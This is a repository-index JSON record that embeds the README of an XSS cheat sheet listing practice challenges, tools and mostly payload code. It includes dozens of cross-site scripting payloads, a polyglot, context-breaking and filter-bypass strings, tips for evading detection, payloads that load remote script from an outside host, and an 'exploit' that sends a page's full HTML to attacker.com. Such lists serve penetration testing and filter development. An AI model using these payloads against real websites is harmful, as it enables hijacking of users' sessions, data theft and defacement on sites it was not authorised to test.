{"id":13530064,"url":"https://github.com/s0md3v/AwesomeXSS","last_synced_at":"2025-04-01T17:31:49.692Z","repository":{"id":37432499,"uuid":"124765446","full_name":"s0md3v/AwesomeXSS","owner":"s0md3v","description":"Awesome XSS stuff","archived":false,"fork":false,"pushed_at":"2024-10-30T19:01:10.000Z","size":3654,"stargazers_count":4871,"open_issues_count":0,"forks_count":767,"subscribers_count":238,"default_branch":"master","last_synced_at":"2025-03-24T21:38:28.564Z","etag":null,"topics":["payload","payload-list","xss","xss-cheatsheet","xss-detection","xss-payloads"],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/s0md3v.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"s0md3v","custom":"https://paypal.me/s0md3v"}},"created_at":"2018-03-11T14:35:30.000Z","updated_at":"2025-03-24T11:20:04.000Z","dependencies_parsed_at":"2022-07-20T12:17:29.101Z","dependency_job_id":"7a3d081d-3df3-4a40-978e-fb615c460a8c","html_url":"https://github.com/s0md3v/AwesomeXSS","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/s0md3v%2FAwesomeXSS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/s0md3v","download_url":"https://codeload.github.com/s0md3v/AwesomeXSS/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246680354,"owners_count":20816684,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["payload","payload-list","xss","xss-cheatsheet","xss-detection","xss-payloads"],"created_at":"2024-08-01T07:00:42.825Z","updated_at":"2025-04-01T17:31:48.126Z","avatar_url":"https://github.com/s0md3v.png","language":"JavaScript","funding_links":["https://github.com/sponsors/s0md3v","https://paypal.me/s0md3v"],"categories":["Uncategorized","JavaScript","\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing","Introduction","Resource","JavaScript (485)","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集","Security \u0026 Hacking","Bugs"],"sub_categories":["Uncategorized","\u003ca id=\"5d7191f01544a12bdaf1315c3e986dff\"\u003e\u003c/a\u003eXSS\u0026\u0026XXE","XSS - Cross-Site Scripting","XSS"],"readme":"# AwesomeXSS\nThis repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.\n\n### Awesome contents\n- [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)\n- [Reads \u0026 Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)\n- [Tools](https://github.com/s0md3v/AwesomeXSS#awesome-tools)\n- [Mind maps](https://github.com/s0md3v/AwesomeXSS#awesome-xss-mind-maps)\n- [DOM XSS](https://github.com/s0md3v/AwesomeXSS#awesome-dom-xss)\n- [Payloads](https://github.com/s0md3v/AwesomeXSS#awesome-payloads)\n- [Polyglots](https://github.com/s0md3v/AwesomeXSS#awesome-polyglots)\n- [Tags and event handlers](https://github.com/s0md3v/AwesomeXSS#awesome-tags--event-handlers)\n- [Context breaking](https://github.com/s0md3v/AwesomeXSS#awesome-context-breaking)\n    - [HTML context](https://github.com/s0md3v/AwesomeXSS#html-context)\n    - [Attribute context](https://github.com/s0md3v/AwesomeXSS#attribute-context)\n    - [JavaScript context](https://github.com/s0md3v/AwesomeXSS#javascript-context)\n- [Confirm Variants](https://github.com/s0md3v/AwesomeXSS#awesome-confirm-variants)\n- [Exploits](https://github.com/s0md3v/AwesomeXSS#awesome-exploits)\n- [Probing](https://github.com/s0md3v/AwesomeXSS#awesome-probing)\n- [Bypassing](https://github.com/s0md3v/AwesomeXSS#awesome-bypassing)\n- [Encoding](https://github.com/s0md3v/AwesomeXSS#awesome-encoding)\n- [Tips \u0026 tricks](https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks)\n\n### Awesome Challenges\n- [prompt.ml](https://prompt.ml)\n- [alf.nu/alert1](https://alf.nu/alert1)\n- [xss-game.appspot.com](https://xss-game.appspot.com)\n- [polyglot.innerht.ml](https://polyglot.innerht.ml)\n- [sudo.co.il/xss](http://sudo.co.il/xss)\n- [root-me.org](https://www.root-me.org/?page=recherche\u0026lang=en\u0026recherche=xss)\n- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)\n- [wechall.net](https://www.wechall.net/challs/XSS)\n- [codelatte.id/labs/xss](https://codelatte.id/labs/xss)\n\n### Awesome Reads \u0026 Presentations\n- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)\n- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)\n- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)\n- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)\n- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)\n- [Copy Pest](https://www.slideshare.net/x00mario/copypest)\n\n### Awesome Tools\n- [XSStrike](https://github.com/UltimateHackers/XSStrike)\n- [BeEF](https://github.com/beefproject/beef)\n- [JShell](https://github.com/UltimateHackers/JShell)\n\n### Awesome XSS Mind Maps\nA beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)\n\n### Awesome DOM XSS\n\n- Does your input go into a sink? `Vulnerable`\n- It doesn't? `Not vulnerable`\n\n**Source**: An input that could be controlled by an external (untrusted) source.\n\n```\ndocument.URL\ndocument.documentURI\ndocument.URLUnencoded (IE 5.5 or later Only)\ndocument.baseURI\nlocation\nlocation.href\nlocation.search\nlocation.hash\nlocation.pathname\ndocument.cookie\ndocument.referrer\nwindow.name\nhistory.pushState()\nhistory.replaceState()\nlocalStorage\nsessionStorage\n```\n\n**Sink**: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.\n\n```\neval\nFunction\nsetTimeout\nsetInterval\nsetImmediate\nexecScript\ncrypto.generateCRMFRequest\nScriptElement.src\nScriptElement.text\nScriptElement.textContent\nScriptElement.innerText\nanyTag.onEventName\ndocument.write\ndocument.writeln\nanyElement.innerHTML\nRange.createContextualFragment\nwindow.location\ndocument.location\n```\n\nThis comprehensive list of sinks and source is taken from [domxsswiki](https://github.com/wisec/domxsswiki).\n\n### Awesome Payloads\n```\n\u003cA/hREf=\"j%0aavas%09cript%0a:%09con%0afirm%0d``\"\u003ez\n\u003cd3\"\u003c\"/onclick=\"1\u003e[confirm``]\"\u003c\"\u003ez\n\u003cd3/onmouseenter=[2].find(confirm)\u003ez\n\u003cdetails open ontoggle=confirm()\u003e\n\u003cscript y=\"\u003e\u003c\"\u003e/*\u003cscript* */prompt()\u003c/script\n\u003cw=\"/x=\"y\u003e\"/ondblclick=`\u003c`[confir\\u006d``]\u003ez\n\u003ca href=\"javascript%26colon;alert(1)\"\u003eclick\n\u003ca href=javas\u0026#99;ript:alert(1)\u003eclick\n\u003cscript/\"\u003ca\"/src=data:=\".\u003ca,[8].some(confirm)\u003e\n\u003csvg/x=\"\u003e\"/onload=confirm()//\n\u003c--`\u003cimg/src=` onerror=confirm``\u003e --!\u003e\n\u003csvg%0Aonload=%09((pro\\u006dpt))()//\n\u003csCript x\u003e(((confirm)))``\u003c/scRipt x\u003e\n\u003csvg \u003c/onload =\"1\u003e (_=prompt,_(1)) \"\"\u003e\n\u003c!--\u003e\u003cscript src=//14.rs\u003e\n\u003cembed src=//14.rs\u003e\n\u003cscript x=\"\u003e\" src=//15.rs\u003e\u003c/script\u003e\n\u003c!'/*\"/*/'/*/\"/*--\u003e\u003c/Script\u003e\u003cImage SrcSet=K */; OnError=confirm`1` //\u003e\n\u003ciframe/src \\/\\/onload = prompt(1)\n\u003cx oncut=alert()\u003ex\n\u003csvg onload=write()\u003e\n```\n\n### Awesome Polyglots\n\nHere's an XSS polyglot that I made which can break out of 20+ contexts:\n```\n%0ajavascript:`/*\\\"/*--\u003e\u0026lt;svg onload='/*\u003c/template\u003e\u003c/noembed\u003e\u003c/noscript\u003e\u003c/style\u003e\u003c/title\u003e\u003c/textarea\u003e\u003c/script\u003e\u003chtml onmouseover=\"/**/ alert()//'\"\u003e`\n```\n\nExplanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)\n\n### Awesome Tags \u0026 Event Handlers\n- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)\n- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)\n\nSome less detected event handlers\n```\nontoggle\nonauxclick\nondblclick\noncontextmenu\nonmouseleave\nontouchcancel\n```\n\nSome HTML Tags that you will be using\n```\nimg\nsvg\nbody\nhtml\nembed\nscript\nobject\ndetails\nisindex\niframe\naudio\nvideo\n```\n\n### Awesome Context Breaking\n\n#### HTML Context\nCase: `\u003ctag\u003eYou searched for $input. \u003c/tag\u003e`\n\n```\n\u003csvg onload=alert()\u003e\n\u003c/tag\u003e\u003csvg onload=alert()\u003e\n```\n\n#### Attribute Context\n\nCase: `\u003ctag attribute=\"$input\"\u003e`\n\n```\n\"\u003e\u003csvg onload=alert()\u003e\n\"\u003e\u003csvg onload=alert()\u003e\u003cb attr=\"\n\" onmouseover=alert() \"\n\"onmouseover=alert()//\n\"autofocus/onfocus=\"alert()\n```\n#### JavaScript Context\n\nCase: `\u003cscript\u003e var new something = '$input'; \u003c/script\u003e`\n\n```\n'-alert()-'\n'-alert()//'\n'}alert(1);{'\n'}%0Aalert(1);%0A{'\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\n\n### Awesome Confirm Variants\nYep, confirm because alert is too mainstream.\n```\nconfirm()\nconfirm``\n(confirm``)\n{confirm``}\n[confirm``]\n(((confirm)))``\nco\\u006efirm()\nnew class extends confirm``{}\n[8].find(confirm)\n[8].map(confirm)\n[8].some(confirm)\n[8].every(confirm)\n[8].filter(confirm)\n[8].findIndex(confirm)\n```\n\n### Awesome Exploits\n##### Replace all links\n```javascript\nArray.from(document.getElementsByTagName(\"a\")).forEach(function(i) {\n  i.href = \"https://attacker.com\";\n});\n```\n##### Source Code Stealer\n```html\n\u003csvg/onload=\"(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML\"\u003e\n```\n\n### Awesome Probing\nIf nothing of this works, take a look at **Awesome Bypassing** section\n\nFirst of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of reflections.\n\u003cbr\u003eNow for attribute context, check if double quotes (\") are being filtered by entering `x\"d3v`. If it gets altered to `x\u0026quot;d3v`, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`, if it gets altered to `x\u0026apos;`, you are doomed. The only thing you can try is encoding.\u003cbr\u003e\nIf the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.\n\u003cbr\u003eFor javascript context, check which quotes are being used for example if they are doing\n```\nvariable = 'value' or variable = \"value\"\n```\nNow lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\\'d3v`, try escaping the backslash (\\) by adding a backslash to your probe i.e. `x\\'d3v`. If it works use the following payload:\n```\n\\'-alert()//\n```\nBut if it gets altered to `x\\\\\\'d3v`, the only thing you can try is closing the script tag itself by using\n```\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\nFor simple HTML context, the probe is `x\u003cd3v`. If it gets altered to `x\u0026gt;d3v`, proper sanitization is in place. If it gets reflected as it as, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is `x\u003cxxx\u003e`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `\u003c` and `\u003e`. It can simply bypassed using\n```\n\u003csvg onload=alert()//\n```\nor this (it will not work in all cases)\n```\n\u003csvg onload=alert()\n```\nIf the your dummy tags lands in the source code as it is, go for any of these payloads\n```\n\u003csvg onload=alert()\u003e\n\u003cembed src=//14.rs\u003e\n\u003cdetails open ontoggle=alert()\u003e\n```\n\n### Awesome Bypassing\n\n**Note:** None of these payloads use single (') or double quotes (\").\n\n- Without event handlers\n```\n\u003cobject data=javascript:confirm()\u003e\n\u003ca href=javascript:confirm()\u003eclick here\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without space\n```\n\u003csvg/onload=confirm()\u003e\n\u003ciframe/src=javascript:alert(1)\u003e\n```\n- Without slash (/)\n```\n\u003csvg onload=confirm()\u003e\n\u003cimg src=x onerror=confirm()\u003e\n```\n- Without equal sign (=)\n```\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without closing angular bracket (\u003e)\n```\n\u003csvg onload=confirm()//\n```\n- Without alert, confirm, prompt\n```\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003csvg onload=co\\u006efirm()\u003e\n\u003csvg onload=z=co\\u006efir\\u006d,z()\u003e\n```\n- Without a Valid HTML tag\n```\n\u003cx onclick=confirm()\u003eclick here\n\u003cx ondrag=aconfirm()\u003edrag it\n```\n\n- Bypass tag blacklisting\n```\n\u003c/ScRipT\u003e\n\u003c/script\n\u003c/script/\u003e\n\u003c/script x\u003e\n```\n\n### Awesome Encoding\n\n|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|\n|----|----|-------|-----------|----|--------|----------|---|\n|`\u0026quot;`|\"|`\u0026#34;`|quotation mark|u+0022|\\0022|\\42|%22|\n|`\u0026num;`|#|`\u0026#35;`|number sign|u+0023|\\0023|\\43|%23|\n|`\u0026dollar;`|$|`\u0026#36;`|dollar sign|u+0024|\\0024|\\44|%24|\n|`\u0026percnt;`|%|`\u0026#37;`|percent sign|u+0025|\\0025|\\45|%25|\n|`\u0026amp;`|\u0026|`\u0026#38;`|ampersand|u+0026|\\0026|\\46|%26|\n|`\u0026apos;`|'|`\u0026#39;`|apostrophe|u+0027|\\0027|\\47|%27|\n|`\u0026lpar;`|(|`\u0026#40;`|left parenthesis|u+0028|\\0028|\\50|%28|\n|`\u0026rpar;`|)|`\u0026#41;`|right parenthesis|u+0029|\\0029|\\51|%29|\n|`\u0026ast;`|*|`\u0026#42;`|asterisk|u+002A|\\002a|\\52|%2A|\n|`\u0026plus;`|+|`\u0026#43;`|plus sign|u+002B|\\002b|\\53|%2B|\n|`\u0026comma;`|,|`\u0026#44;`|comma|u+002C|\\002c|\\54|%2C|\n|`\u0026minus;`|-|`\u0026#45;`|hyphen-minus|u+002D|\\002d|\\55|%2D|\n|`\u0026period;`|.|`\u0026#46;`|full stop; period|u+002E|\\002e|\\56|%2E|\n|`\u0026sol;`|/|`\u0026#47;`|solidus; slash|u+002F|\\002f|\\57|%2F|\n|`\u0026colon;`|:|`\u0026#58;`|colon|u+003A|\\003a|\\72|%3A|\n|`\u0026semi;`|;|`\u0026#59;`|semicolon|u+003B|\\003b|\\73|%3B|\n|`\u0026lt;`|\u003c|`\u0026#60;`|less-than|u+003C|\\003c|\\74|%3C|\n|`\u0026equals;`|=|`\u0026#61;`|equals|u+003D|\\003d|\\75|%3D|\n|`\u0026gt;`|\u003e|`\u0026#62;`|greater-than sign|u+003E|\\003e|\\76|%3E|\n|`\u0026quest;`|?|`\u0026#63;`|question mark|u+003F|\\003f|\\77|%3F|\n|`\u0026commat;`|@|`\u0026#64;`|at sign; commercial at|u+0040|\\0040|\\100|%40|\n|`\u0026lsqb;`|\\[|`\u0026#91;`|left square bracket|u+005B|\\005b|\\133|%5B|\n|`\u0026bsol;`|\u0026bsol;|`\u0026#92;`|backslash|u+005C|\\005c|\\134|%5C|\n|`\u0026rsqb;`|]|`\u0026#93;`|right square bracket|u+005D|\\005d|\\135|%5D|\n|`\u0026Hat;`|^|`\u0026#94;`|circumflex accent|u+005E|\\005e|\\136|%5E|\n|`\u0026lowbar;`|_|`\u0026#95;`|low line|u+005F|\\005f|\\137|%5F|\n|`\u0026grave;`|\\`|`\u0026#96;`|grave accent|u+0060|\\0060|\\u0060|%60|\n|`\u0026lcub;`|{|`\u0026#123;`|left curly bracket|u+007b|\\007b|\\173|%7b|\n|`\u0026verbar;`|\\||`\u0026#124;`|vertical bar|u+007c|\\007c|\\174|%7c|\n|`\u0026rcub;`|}|`\u0026#125;`|right curly bracket|u+007d|\\007d|\\175|%7d|\n\n### Awesome Tips \u0026 Tricks\n- `http(s)://` can be shortened to `//` or `/\\\\` or `\\\\`.\n- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.\n- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`\n- You can use `//` to close a tag instead of `\u003e`.\n- I have found that `confirm` is the least detected pop-up function so stop using `alert`.\n- Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use `\u003cscript src=//14.rs\u003e` instead of `\u003cscript src=\"//14.rs\"\u003e`\n- The shortest HTML context XSS payload is `\u003cscript src=//14.rs\u003e` (19 chars)\n\n### Awesome Credits\nAll the payloads are crafted by me unless specified.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fs0md3v%2FAwesomeXSS","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fs0md3v%2FAwesomeXSS","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fs0md3v%2FAwesomeXSS/lists"}